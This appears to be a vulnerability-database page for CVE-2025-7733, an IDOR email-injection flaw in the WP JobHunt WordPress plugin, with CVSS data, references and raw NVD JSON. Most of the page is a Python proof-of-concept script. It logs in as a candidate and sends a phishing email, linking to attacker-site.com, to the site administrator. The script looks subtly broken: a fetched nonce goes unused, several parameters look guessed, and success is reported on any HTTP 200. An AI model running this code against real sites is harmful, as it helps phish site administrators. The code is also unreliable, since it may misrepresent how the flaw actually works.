CVE-2025-7733

Description

The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.7 via the 'cs_update_application_status_callback' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Candidate-level access and above, to send a site-generated email with injected HTML to any user.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP JobHunt plugin <= 7.7

JobCareer theme (使用受影响版本的WP JobHunt插件)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-7733 PoC - WP JobHunt IDOR Email Injection
# Authenticated users with Candidate role can inject HTML into emails

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"
USERNAME = "attacker_candidate"
PASSWORD = "candidate_password"

def get_nonce_and_auth():
    """Login and get authentication cookies and nonce"""
    session = requests.Session()
    
    # Login as candidate user
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    
    # Get cookies first
    session.post("https://vulnerable-site.com/wp-login.php", data=login_data)
    
    # Get nonce from plugin's AJAX handler
    nonce_response = session.get(TARGET_URL + "?action=cs_get_nonce")
    
    return session.cookies.get_dict()

def exploit_idor_email_injection(session_cookies):
    """Exploit IDOR to send HTML-injected emails to arbitrary users"""
    
    # Malicious HTML payload for phishing
    malicious_html = """
    <html><body>
    <h1>Account Security Alert</h1>
    <p>Your account has been compromised.</p>
    <p>Please click <a href="http://attacker-site.com/phishing?user={user_id}">here</a> to secure your account.</p>
    </body></html>
    """
    
    # Target user ID to receive the email
    target_user_id = 1  # Usually admin user
    
    # Exploit payload - IDOR via user-controlled key
    exploit_data = {
        'action': 'cs_update_application_status_callback',
        'application_id': target_user_id,  # IDOR: can reference any user's application
        'status': 'approved',
        'email_content': malicious_html.format(user_id=target_user_id),
        'user_id': target_user_id  # User-controlled key without validation
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest'
    }
    
    response = requests.post(
        TARGET_URL,
        data=urlencode(exploit_data),
        cookies=session_cookies,
        headers=headers
    )
    
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] Response: {response.text}")
    
    if "success" in response.text.lower() or response.status_code == 200:
        print("[+] Email injection successful!")
        print(f"[*] Malicious email sent to user ID: {target_user_id}")
    else:
        print("[-] Exploitation failed")

if __name__ == "__main__":
    print("[*] CVE-2025-7733 PoC - WP JobHunt IDOR Email Injection")
    print("[*] Target: WP JobHunt plugin <= 7.7")
    
    cookies = get_nonce_and_auth()
    exploit_idor_email_injection(cookies)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7733
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7733
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7733/
[4] VulDB https://vuldb.com/cve/CVE-2025-7733
[5] https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/409bcd8c-6cd3-4022-a67f-57e901c83d66?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7733", "sourceIdentifier": "[email protected]", "published": "2025-12-20T14:16:03.530", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP JobHunt plugin for WordPress, used by the JobCareer theme, is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 7.7 via the 'cs_update_application_status_callback' due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Candidate-level access and above, to send a site-generated email with injected HTML to any user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://themeforest.net/item/jobcareer-job-board-responsive-wordpress-theme/14221636", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/409bcd8c-6cd3-4022-a67f-57e901c83d66?source=cve", "source": "[email protected]"}]}}